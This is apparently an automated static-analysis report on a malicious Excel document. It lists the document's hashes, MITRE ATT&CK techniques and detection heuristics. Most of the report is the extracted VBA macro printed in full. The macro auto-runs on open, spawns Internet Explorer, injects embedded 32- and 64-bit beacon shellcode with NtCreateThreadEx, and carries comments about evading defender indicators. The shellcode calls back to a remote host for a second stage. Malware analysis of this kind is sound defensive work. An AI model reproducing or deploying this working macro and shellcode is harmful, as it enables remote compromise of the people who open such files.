Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ac2fa4596fd77c0a…

MALICIOUS

Office (OLE)

Size: 161.5 KB
Created: 2019-02-06 12:39:16
Authoring application: Microsoft Excel
First seen: 2019-05-31
MD5: bd24b69ad15cf7afc15100f61d54f948
SHA-1: dc66f7ca3e54b93e174212765cf75c156eae803c
SHA-256: ac2fa4596fd77c0a2216afb06cb85c3e19672fb8a125244d86c712fab8922cdc
Risk Score: 286

Malware Insights

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1055.012 Process Injection

The file is an Excel document containing VBA macros that execute automatically through the AutoOpen and Workbook_Open event handlers. Heuristics flag references to the CreateProcess, VirtualAlloc, WriteProcessMemory and CreateRemoteThread APIs, suggesting that the macro spawns a process and injects and executes a payload in it. The script's own comments reference 'wepwnise' and a 'raw beacon payload', indicating that it is designed to download and run a secondary malicious component.

Heuristics (10)

  • ClamAV: Doc.Macro.Injection-6355574-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Injection-6355574-0
  • Reference to WriteProcessMemory API [critical] SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API [critical] SC_STR_CREATEREMOTETHREAD
    Reference to CreateRemoteThread API
  • Reference to CreateProcess API [high] SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to VirtualAlloc API [medium] SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
      End Function
      Sub AutoOpen()
      Run
  • Workbook_Open macro [low] OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script:
      End Sub
      Private Sub Workbook_Open()
      Run
  • Auto_Open macro [low] OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script:
      End Sub
      Sub Auto_Open()
      Run
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: https://github.com/mwrlabs/wepwnise (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23679 bytes
SHA-256: 689345baedbcbb4925e4b77d2e41c352e66e794c80db58b87854329d905c5245
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Module1"
' This script is taken from wepwnise from mwrlabs @ https://github.com/mwrlabs/wepwnise
' Replaced CreateRemoteThread with NtCreateThreadEx to bypass Blue Team IoC
' Payload is raw beacon payload for TundraGale
' 32 Bit API call and payload needs testing
' Binary launched can be modified
Private Const PROCESS_ALL_ACCESS = &H1F0FFF
Private Const MEM_COMMIT = &H1000
Private Const MEM_RELEASE = &H8000
Private Const PAGE_READWRITE = &H40
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const PROCESSOR_ARCHITECTURE_AMD64 = 9
Private Const GENERIC_ALL = &H10000000
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type
Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
#If VBA7 Then 'x64 office
Private Declare PtrSafe Function ntCreateThreadEx Lib "ntdll" Alias "NtCreateThreadEx" (ByRef lpThreadId As LongPtr, ByRef accessMask As Long, ByRef objAttributes As Any, ByVal hProcess As Long, ByVal lpStartAddress As LongPtr, ByVal lpParameter As Any, ByVal createSuspended As Long, ByVal lpStackZero As Long, ByVal lpStackSizeCommit As Long, ByVal lpStackReserved As Long, threadInfo As Any) As Long
Private Declare PtrSafe Function terminateProcess Lib "kernel32" Alias "TerminateProcess" (ByVal hProcess As Long, ByVal uExitCode As Long) As Boolean
Private Declare PtrSafe Function virtualAllocEx Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function virtualFreeEx Lib "kernel32" Alias "VirtualFreeEx" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal dwFreeType As Long) As LongPtr
Private Declare PtrSafe Function writeProcessMemory Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As LongPtr, ByRef lpBuffer As Any, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As LongPtr) As LongPtr
Private Declare PtrSafe Sub getSysInfo Lib "kernel32" Alias "GetSystemInfo" (lpSystemInfo As SYSTEM_INFO)
Private Declare PtrSafe Function getCurrProc Lib "kernel32" Alias "GetCurrentProcess" () As LongPtr
Private Declare PtrSafe Function is64Proc Lib "kernel32" Alias "IsWow64Process" (ByVal hProcess As LongPtr, ByRef Wow64Process As Boolean) As Boolean
Private Declare PtrSafe Function createProcA Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, ByVal lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Type SYSTEM_INFO
wProcessorArchitecture As Integer
wReserved As Integer
dwPageSize As Long
lpMinimumApplicationAddress As LongPtr
lpMaximumApplicationAddress As LongPtr
dwActiveProcessorMask As LongPtr
dwNumberOrfProcessors As Long
dwProcessorType As Long
dwAllocationGranularity As Long
wProcessorLevel As Integer
wProcessorRevision As Integer
End Type
#Else
Private Declare Function ntCreateThreadEx Lib "ntdll.dll" Alias "NtCreateThreadEx" (ByVal lpThreadId as LongPtr, ByVal accessMask as Any, ByRef objectAttributes as Any, ByVal hProcess as Long, ByVal lpStartAddress As LongPtr, lpParameter As Any, ByVal createSuspended as Boolean, lpStackZero as Long, lpStackSizeCommit as Long, lpStackReserved as long, threadInfo as Any) as Long
Private Declare Function terminateProcess Lib "kernel32" Alias "TerminateProcess" (ByVal hProcess As Long, ByVal uExitCode As Long) As Boolean
Private Declare Function virtualAllocEx Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddress As Any, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function virtualFreeEx Lib "kernel32" Alias "VirtualFreeEx" (ByVal hProcess As Long, ByVal lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function writeProcessMemory Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByRef lpBuffer As Any, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long
Private Declare Function createRemoteThread Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Any, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Private Declare Sub getSysInfo Lib "kernel32" Alias "GetSystemInfo" (lpSystemInfo As SYSTEM_INFO)
Private Declare Function getCurrProc Lib "kernel32" Alias "GetCurrentProcess" () As Long
Private Declare Function is64Proc Lib "kernel32" Alias "IsWow64Process" (ByVal hProcess As Long, ByRef Wow64Process As Boolean) As Boolean
Private Declare Function createProcA Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
Private Type SYSTEM_INFO
wProcessorArchitecture As Integer
wReserved As Integer
dwPageSize As Long
lpMinimumApplicationAddress As Long
lpMaximumApplicationAddress As Long
dwActiveProcessorMask As Long
dwNumberOrfProcessors As Long
dwProcessorType As Long
dwAllocationGranularity As Long
dwReserved As Long
End Type
#End If
Dim inject64 As Boolean
Public Function IsOffice64Bit() As Boolean
Dim lpSystemInfo As SYSTEM_INFO
Call getSysInfo(lpSystemInfo)
If lpSystemInfo.wProcessorArchitecture = PROCESSOR_ARCHITECTURE_AMD64 Then
Call is64Proc(getCurrProc(), IsOffice64Bit)
IsOffice64Bit = Not IsOffice64Bit
End If
End Function
Public Function IsWow64(handle As Long) As Boolean
Call is64Proc(handle, t)
IsWow64 = Not t
End Function
Public Function getList() As String()
Dim myList As String
' list of binaries to try
myList = ""
myList = myList & "C:\Windows\System32\iexplore.exe" & ","
myList = myList & "C:\Windows\SysWOW64\iexplore.exe" & ","
myArray = Split(myList, ",")
Dim c As Integer
Dim list() As String
For c = LBound(myArray) To (UBound(myArray) - 1)
ReDim Preserve list(c)
list(c) = myArray(c)
Next
getList = list
End Function
Public Function Run() As Long
myArray = getList
Dim Count As Integer
Dim Success As Integer
For Count = LBound(myArray) To UBound(myArray)
Dim proc As String
proc = myArray(Count)
Success = Inject(proc)
If Success = 1 Then Exit For
Next
End Function
Public Function Inject(processCmd As String) As Long
Dim myByte As Long, buf As Variant, myCount As Long, hProcess As Long
#If VBA7 Then
    Dim lLinkToLibary As Long, comp As LongPtr, hThread As LongPtr
#Else
    Dim lLinkToLibary As Long, comp As Long, hThread As Long
#End If
Dim pInfo As PROCESS_INFORMATION
Dim sInfo As STARTUPINFO
Dim sNull As String
Dim sProc As String
sInfo.dwFlags = 1
If IsOffice64Bit Then
On Error Resume Next
sProc = processCmd
' Spawn process
res = createProcA(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
hProcess = pInfo.hProcess
Dim b64 As Boolean
b64 = False
b64 = IsWow64(hProcess)
inject64 = True
If b64 = True Then
If inject64 = True Then
If hProcess = 0 Then
Exit Function
End If
'//function definition for VirtualAllocEx
'LPVOID VirtualAllocEx(
'  HANDLE hProcess,
'  LPVOID lpAddress,
'  SIZE_T dwSize, // Size of the byte array below
'  DWORD  flAllocationType,
'  DWORD  flProtect
');
lLinkToLibrary = virtualAllocEx(hProcess, 0&, &H3BB, &H3000, PAGE_READWRITE)
If lLinkToLibrary = 0 Then
term = terminateProcess(hProcess, leave_func) ' bail
Exit Function
End If
Position = lLinkToLibrary
' 64 bit payload
buf = Array(72, 131, 228, 240, 232, 200, 0, 0, 0, 65, 81, 65, 80, 82, 81, 86, 72, 49, 210, 101, 72, 139, 82, 96, 72, 139, 82, 24, 72, 139, 82, 32, 72, 139, 114, 80, 72, 15, 183, 74, 74, 77, 49, 201, 72, 49, 192, 172, 60, 97, 124, 2, 44, 32, 65, 193, 201, 13, 65, 1, 193, 226, 237, 82, 65, 81, 72, 139, 82, 32, 139, 66, 60, 72, 1, 208, 102, 129, 120, 24, 11, 2, 117, 114, 139, 128, 136, 0, 0, 0, 72, 133, 192, 116, 103, 72, 1, 208, 80, 139, 72, _
24, 68, 139, 64, 32, 73, 1, 208, 227, 86, 72, 255, 201, 65, 139, 52, 136, 72, 1, 214, 77, 49, 201, 72, 49, 192, 172, 65, 193, 201, 13, 65, 1, 193, 56, 224, 117, 241, 76, 3, 76, 36, 8, 69, 57, 209, 117, 216, 88, 68, 139, 64, 36, 73, 1, 208, 102, 65, 139, 12, 72, 68, 139, 64, 28, 73, 1, 208, 65, 139, 4, 136, 72, 1, 208, 65, 88, 65, 88, 94, 89, 90, 65, 88, 65, 89, 65, 90, 72, 131, 236, 32, 65, 82, 255, 224, 88, 65, 89, 90, _
72, 139, 18, 233, 79, 255, 255, 255, 93, 106, 0, 73, 190, 119, 105, 110, 105, 110, 101, 116, 0, 65, 86, 73, 137, 230, 76, 137, 241, 65, 186, 76, 119, 38, 7, 255, 213, 72, 49, 201, 72, 49, 210, 77, 49, 192, 77, 49, 201, 65, 80, 65, 80, 65, 186, 58, 86, 121, 167, 255, 213, 233, 147, 0, 0, 0, 90, 72, 137, 193, 65, 184, 187, 1, 0, 0, 77, 49, 201, 65, 81, 65, 81, 106, 3, 65, 81, 65, 186, 87, 137, 159, 198, 255, 213, 235, 121, 91, 72, 137, _
193, 72, 49, 210, 73, 137, 216, 77, 49, 201, 82, 104, 0, 50, 160, 132, 82, 82, 65, 186, 235, 85, 46, 59, 255, 213, 72, 137, 198, 72, 131, 195, 80, 106, 10, 95, 72, 137, 241, 186, 31, 0, 0, 0, 106, 0, 104, 128, 51, 0, 0, 73, 137, 224, 65, 185, 4, 0, 0, 0, 65, 186, 117, 70, 158, 134, 255, 213, 72, 137, 241, 72, 137, 218, 73, 199, 192, 255, 255, 255, 255, 77, 49, 201, 82, 82, 65, 186, 45, 6, 24, 123, 255, 213, 133, 192, 15, 133, 157, 1, _
0, 0, 72, 255, 207, 15, 132, 140, 1, 0, 0, 235, 179, 233, 228, 1, 0, 0, 232, 130, 255, 255, 255, 47, 81, 66, 100, 102, 0, 27, 33, 58, 1, 183, 209, 29, 42, 124, 97, 241, 214, 82, 48, 8, 253, 204, 103, 26, 114, 91, 72, 198, 51, 7, 51, 251, 22, 54, 4, 60, 169, 253, 130, 97, 70, 109, 163, 119, 171, 238, 224, 219, 56, 39, 67, 50, 44, 206, 6, 171, 248, 101, 122, 169, 174, 190, 216, 202, 224, 175, 192, 201, 137, 225, 178, 48, 193, 44, 48, 238, _
236, 100, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 49, 48, 46, 48, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 55, 46, 48, 59, 32, 114, 118, 58, 49, 49, 46, 48, 41, 32, 108, 105, 107, 101, 32, 71, 101, 99, 107, 111, 13, 10, 0, 219, 247, 132, 185, 202, 195, 106, 44, 187, 212, 64, 110, 172, _
139, 22, 10, 192, 217, 24, 178, 100, 178, 88, 185, 187, 18, 143, 149, 31, 175, 186, 35, 154, 20, 184, 151, 18, 224, 131, 176, 15, 187, 93, 243, 246, 112, 68, 106, 133, 143, 77, 7, 8, 254, 32, 131, 225, 169, 35, 164, 238, 154, 136, 83, 192, 85, 25, 136, 138, 97, 197, 146, 96, 147, 58, 226, 177, 2, 3, 65, 109, 197, 104, 174, 181, 188, 47, 107, 239, 17, 226, 200, 143, 21, 38, 243, 159, 124, 211, 195, 252, 106, 88, 213, 169, 128, 124, 191, 56, 223, 44, 10, 33, _
195, 12, 225, 25, 82, 249, 128, 142, 136, 94, 195, 188, 189, 235, 78, 111, 158, 44, 123, 10, 145, 8, 57, 113, 139, 6, 94, 31, 71, 90, 4, 126, 6, 229, 1, 50, 47, 205, 65, 67, 130, 68, 64, 234, 16, 132, 143, 10, 25, 182, 96, 247, 210, 25, 238, 30, 194, 216, 35, 238, 237, 237, 122, 205, 51, 38, 73, 25, 113, 235, 94, 105, 117, 122, 29, 63, 163, 204, 124, 30, 79, 27, 201, 253, 179, 57, 181, 52, 0, 103, 59, 103, 237, 100, 49, 5, 120, 250, 203, 221, _
86, 125, 243, 222, 225, 196, 0, 65, 190, 240, 181, 162, 86, 255, 213, 72, 49, 201, 186, 0, 0, 64, 0, 65, 184, 0, 16, 0, 0, 65, 185, 64, 0, 0, 0, 65, 186, 88, 164, 83, 229, 255, 213, 72, 147, 83, 83, 72, 137, 231, 72, 137, 241, 72, 137, 218, 65, 184, 0, 32, 0, 0, 73, 137, 249, 65, 186, 18, 150, 137, 226, 255, 213, 72, 131, 196, 32, 133, 192, 116, 182, 102, 139, 7, 72, 1, 195, 133, 192, 117, 215, 88, 88, 88, 72, 5, 0, 0, 0, 0, _
80, 195, 232, 127, 253, 255, 255, 49, 55, 50, 46, 49, 54, 46, 49, 49, 46, 50, 50, 0, 121, 68, 121, 155)
For myCount = LBound(buf) To UBound(buf)
myByte = buf(myCount)
'//function definition for WriteProcessMemory (documented WinAPI)
'BOOL WriteProcessMemory(
'  HANDLE  hProcess,
'  LPVOID  lpBaseAddress,
'  LPCVOID lpBuffer,
'  SIZE_T  nSize,
'  SIZE_T  *lpNumberOfBytesWritten
');
comp = writeProcessMemory(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b)
Next myCount
'//function definition for NtCreateThreadEx (undocumented WinAPI)
'typedef NTSTATUS(WINAPI *pNtCreateThreadEx)(
'    OUT PHANDLE hThread,
'    IN ACCESS_MASK DesiredAccess,
'    IN LPVOID ObjectAttributes,
'    IN HANDLE ProcessHandle,
'    IN LPTHREAD_START_ROUTINE lpStartAddress,
'    IN LPVOID lpParameter,
'    IN SIZE_T CreateSuspended, //(BOOL)
'    IN SIZE_T StackZeroBits,
'    IN SIZE_T SizeOfStackCommit,
'    IN SIZE_T SizeOfStackReserve,
'    OUT LPVOID lpBytesBuffer
retVal = ntCreateThreadEx(hThread, ByVal GENERIC_ALL, ByVal 0&, ByVal hProcess, ByVal lLinkToLibrary, 0&, False, 0, 0, 0, ByVal 0&)
End If
If hThread = 0 Or inject64 = False Then
If lLinkToLibrary <> 0 Then
virtualFreeEx hProcess, lLinkToLibrary, 0, MEM_RELEASE
End If
hProcess = pInfo.hProcess
term = terminateProcess(hProcess, leave_func)
Exit Function
Else
Inject = 1 'Success
End If
Else
If hProcess = 0 Then
Exit Function
End If
lLinkToLibrary = virtualAllocEx(hProcess, 0&, &H35E, &H3000, PAGE_READWRITE)
If lLinkToLibrary = 0 Then
term = terminateProcess(hProcess, leave_func)
Exit Function
End If
Position = lLinkToLibrary
' 32bit payload
buf = Array(232, 137, 0, 0, 0, 96, 137, 229, 49, 210, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 240, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, 116, 74, 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 227, 60, 73, 139, 52, 139, 1, 214, 49, 255, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, 36, _
117, 226, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, 235, 134, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 232, 0, 0, 0, 0, 49, 255, 87, 87, 87, 87, 87, 104, 58, 86, 121, 167, 255, 213, 233, 164, 0, 0, 0, 91, 49, 201, 81, 81, 106, 3, 81, 81, 104, 187, 1, 0, 0, 83, 80, _
104, 87, 137, 159, 198, 255, 213, 80, 233, 140, 0, 0, 0, 91, 49, 210, 82, 104, 0, 50, 160, 132, 82, 82, 82, 83, 82, 80, 104, 235, 85, 46, 59, 255, 213, 137, 198, 131, 195, 80, 104, 128, 51, 0, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 95, 49, 255, 87, 87, 106, 255, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 15, 132, 202, 1, 0, 0, 49, 255, 133, 246, 116, 4, 137, 249, 235, 9, 104, 170, 197, 226, 93, 255, _
213, 137, 193, 104, 69, 33, 94, 49, 255, 213, 49, 255, 87, 106, 7, 81, 86, 80, 104, 183, 87, 224, 11, 255, 213, 191, 0, 47, 0, 0, 57, 199, 117, 7, 88, 80, 233, 123, 255, 255, 255, 49, 255, 233, 145, 1, 0, 0, 233, 201, 1, 0, 0, 232, 111, 255, 255, 255, 47, 79, 118, 76, 75, 0, 169, 42, 221, 124, 196, 96, 154, 90, 224, 142, 173, 219, 39, 131, 63, 21, 215, 79, 242, 87, 128, 167, 31, 24, 106, 185, 27, 24, 75, 127, 98, 51, 90, 176, 225, 236, _
174, 35, 82, 148, 23, 36, 5, 39, 181, 137, 2, 21, 151, 43, 38, 233, 192, 81, 241, 199, 146, 43, 7, 3, 68, 238, 83, 216, 195, 160, 174, 40, 28, 201, 15, 79, 67, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 49, 48, 46, 48, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 55, 46, 48, 59, 32, _
114, 118, 58, 49, 49, 46, 48, 41, 32, 108, 105, 107, 101, 32, 71, 101, 99, 107, 111, 13, 10, 0, 196, 128, 46, 161, 63, 82, 247, 230, 37, 33, 129, 32, 183, 91, 107, 87, 165, 245, 80, 211, 106, 92, 117, 40, 90, 248, 185, 221, 179, 139, 225, 127, 69, 184, 42, 18, 202, 172, 209, 75, 17, 2, 91, 205, 187, 160, 43, 80, 26, 240, 3, 142, 161, 114, 161, 225, 205, 231, 18, 20, 210, 214, 83, 148, 249, 193, 205, 69, 192, 178, 83, 61, 72, 207, 167, 163, 38, 49, _
113, 23, 224, 68, 206, 213, 123, 179, 10, 90, 55, 149, 62, 213, 201, 23, 40, 104, 235, 142, 120, 15, 14, 158, 185, 159, 28, 99, 94, 246, 224, 189, 51, 49, 154, 216, 100, 116, 91, 113, 233, 131, 49, 2, 211, 254, 149, 222, 20, 142, 162, 209, 152, 40, 19, 35, 218, 138, 219, 89, 131, 23, 28, 95, 20, 171, 65, 145, 200, 82, 236, 97, 185, 132, 17, 58, 7, 230, 214, 44, 234, 73, 119, 116, 99, 169, 197, 129, 79, 164, 74, 185, 241, 143, 163, 173, 238, 178, 118, 122, _
235, 243, 137, 213, 32, 171, 37, 219, 74, 11, 167, 81, 114, 19, 100, 81, 69, 226, 239, 56, 166, 252, 172, 174, 225, 21, 207, 79, 109, 99, 108, 208, 132, 112, 74, 58, 236, 133, 153, 72, 78, 0, 104, 240, 181, 162, 86, 255, 213, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 87, 104, 88, 164, 83, 229, 255, 213, 147, 185, 0, 0, 0, 0, 1, 217, 81, 83, 137, 231, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 198, _
139, 7, 1, 195, 133, 192, 117, 229, 88, 195, 232, 137, 253, 255, 255, 49, 55, 50, 46, 49, 54, 46, 49, 49, 46, 50, 50, 0, 121, 68, 121, 155)
For myCount = LBound(buf) To UBound(buf)
myByte = buf(myCount)
comp = writeProcessMemory(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b)
Next myCount
retVal = ntCreateThreadEx(hThread, ByVal GENERIC_ALL, ByVal 0&, ByVal hProcess, ByVal lLinkToLibrary, 0&, False, 0, 0, 0, ByVal 0&)
If hThread = 0 Then
If lLinkToLibrary <> 0 Then
virtualFreeEx hProcess, lLinkToLibrary, 0, MEM_RELEASE
End If
hProcess = pInfo.hProcess
term = terminateProcess(hProcess, leave_func)
Exit Function
Else
Inject = 1 'Success
End If
End If
Else
sProc = processCmd
res = createProcA(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
hProcess = pInfo.hProcess
If hProcess = 0 Then
Exit Function
End If
lLinkToLibrary = virtualAllocEx(hProcess, 0&, &H35E, &H3000, PAGE_READWRITE)
If lLinkToLibrary = 0 Then
term = terminateProcess(hProcess, leave_func)
Exit Function
End If
Position = lLinkToLibrary
' 32bit payload
buf = Array(232, 137, 0, 0, 0, 96, 137, 229, 49, 210, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 240, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, 116, 74, 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 227, 60, 73, 139, 52, 139, 1, 214, 49, 255, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, 36, _
117, 226, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, 235, 134, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, 255, 213, 232, 0, 0, 0, 0, 49, 255, 87, 87, 87, 87, 87, 104, 58, 86, 121, 167, 255, 213, 233, 164, 0, 0, 0, 91, 49, 201, 81, 81, 106, 3, 81, 81, 104, 187, 1, 0, 0, 83, 80, _
104, 87, 137, 159, 198, 255, 213, 80, 233, 140, 0, 0, 0, 91, 49, 210, 82, 104, 0, 50, 160, 132, 82, 82, 82, 83, 82, 80, 104, 235, 85, 46, 59, 255, 213, 137, 198, 131, 195, 80, 104, 128, 51, 0, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 95, 49, 255, 87, 87, 106, 255, 83, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 15, 132, 202, 1, 0, 0, 49, 255, 133, 246, 116, 4, 137, 249, 235, 9, 104, 170, 197, 226, 93, 255, _
213, 137, 193, 104, 69, 33, 94, 49, 255, 213, 49, 255, 87, 106, 7, 81, 86, 80, 104, 183, 87, 224, 11, 255, 213, 191, 0, 47, 0, 0, 57, 199, 117, 7, 88, 80, 233, 123, 255, 255, 255, 49, 255, 233, 145, 1, 0, 0, 233, 201, 1, 0, 0, 232, 111, 255, 255, 255, 47, 79, 118, 76, 75, 0, 169, 42, 221, 124, 196, 96, 154, 90, 224, 142, 173, 219, 39, 131, 63, 21, 215, 79, 242, 87, 128, 167, 31, 24, 106, 185, 27, 24, 75, 127, 98, 51, 90, 176, 225, 236, _
174, 35, 82, 148, 23, 36, 5, 39, 181, 137, 2, 21, 151, 43, 38, 233, 192, 81, 241, 199, 146, 43, 7, 3, 68, 238, 83, 216, 195, 160, 174, 40, 28, 201, 15, 79, 67, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 49, 48, 46, 48, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, 55, 46, 48, 59, 32, _
114, 118, 58, 49, 49, 46, 48, 41, 32, 108, 105, 107, 101, 32, 71, 101, 99, 107, 111, 13, 10, 0, 196, 128, 46, 161, 63, 82, 247, 230, 37, 33, 129, 32, 183, 91, 107, 87, 165, 245, 80, 211, 106, 92, 117, 40, 90, 248, 185, 221, 179, 139, 225, 127, 69, 184, 42, 18, 202, 172, 209, 75, 17, 2, 91, 205, 187, 160, 43, 80, 26, 240, 3, 142, 161, 114, 161, 225, 205, 231, 18, 20, 210, 214, 83, 148, 249, 193, 205, 69, 192, 178, 83, 61, 72, 207, 167, 163, 38, 49, _
113, 23, 224, 68, 206, 213, 123, 179, 10, 90, 55, 149, 62, 213, 201, 23, 40, 104, 235, 142, 120, 15, 14, 158, 185, 159, 28, 99, 94, 246, 224, 189, 51, 49, 154, 216, 100, 116, 91, 113, 233, 131, 49, 2, 211, 254, 149, 222, 20, 142, 162, 209, 152, 40, 19, 35, 218, 138, 219, 89, 131, 23, 28, 95, 20, 171, 65, 145, 200, 82, 236, 97, 185, 132, 17, 58, 7, 230, 214, 44, 234, 73, 119, 116, 99, 169, 197, 129, 79, 164, 74, 185, 241, 143, 163, 173, 238, 178, 118, 122, _
235, 243, 137, 213, 32, 171, 37, 219, 74, 11, 167, 81, 114, 19, 100, 81, 69, 226, 239, 56, 166, 252, 172, 174, 225, 21, 207, 79, 109, 99, 108, 208, 132, 112, 74, 58, 236, 133, 153, 72, 78, 0, 104, 240, 181, 162, 86, 255, 213, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 87, 104, 88, 164, 83, 229, 255, 213, 147, 185, 0, 0, 0, 0, 1, 217, 81, 83, 137, 231, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 198, _
139, 7, 1, 195, 133, 192, 117, 229, 88, 195, 232, 137, 253, 255, 255, 49, 55, 50, 46, 49, 54, 46, 49, 49, 46, 50, 50, 0, 121, 68, 121, 155)
For myCount = LBound(buf) To UBound(buf)
myByte = buf(myCount)
comp = writeProcessMemory(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b)
Next myCount
retVal = ntCreateThreadEx(hThread, ByVal GENERIC_ALL, ByVal 0&, ByVal hProcess, ByVal lLinkToLibrary, 0&, False, 0, 0, 0, ByVal 0&)
If hThread = 0 Then
If lLinkToLibrary <> 0 Then
virtualFreeEx hProcess, lLinkToLibrary, 0, MEM_RELEASE
End If
hProcess = pInfo.hProcess
term = terminateProcess(hProcess, leave_func)
Exit Function
Else
Inject = 1 'Success
End If
End If
End Function
Sub AutoOpen()
Run
End Sub
Private Sub Workbook_Open()
